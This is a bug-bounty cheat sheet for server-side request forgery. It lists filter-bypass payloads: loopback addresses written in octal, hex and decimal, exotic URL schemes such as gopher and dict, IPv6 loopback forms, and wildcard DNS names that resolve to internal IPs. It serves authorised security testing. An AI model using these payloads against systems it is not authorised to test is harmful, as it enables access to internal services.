bugbounty-cheatsheet/cheatsheets/ssrf.md

52 lines
572 B
Markdown
Raw Normal View History

2017-07-14 14:54:44 +01:00
## SSRF
```
http://0177.1/
```
```
http://0x7f.1/
```
```
https://520968996
```
_Note:_ The latter can be calculated using http://www.subnetmask.info/
**Exotic Handlers**
```
gopher://, dict://, php://, jar://, tftp://
```
**IPv6**
```
http://[::1]
```
```
http://[::]
2017-07-17 10:37:38 +01:00
```
**Wildcard DNS**
```
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io
```
2017-07-17 10:39:57 +01:00
_Link:_ http://xip.io
2017-07-17 10:37:38 +01:00
```
10.0.0.1.nip.io maps
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io
```
2017-07-17 10:39:57 +01:00
_Link:_ http://nip.io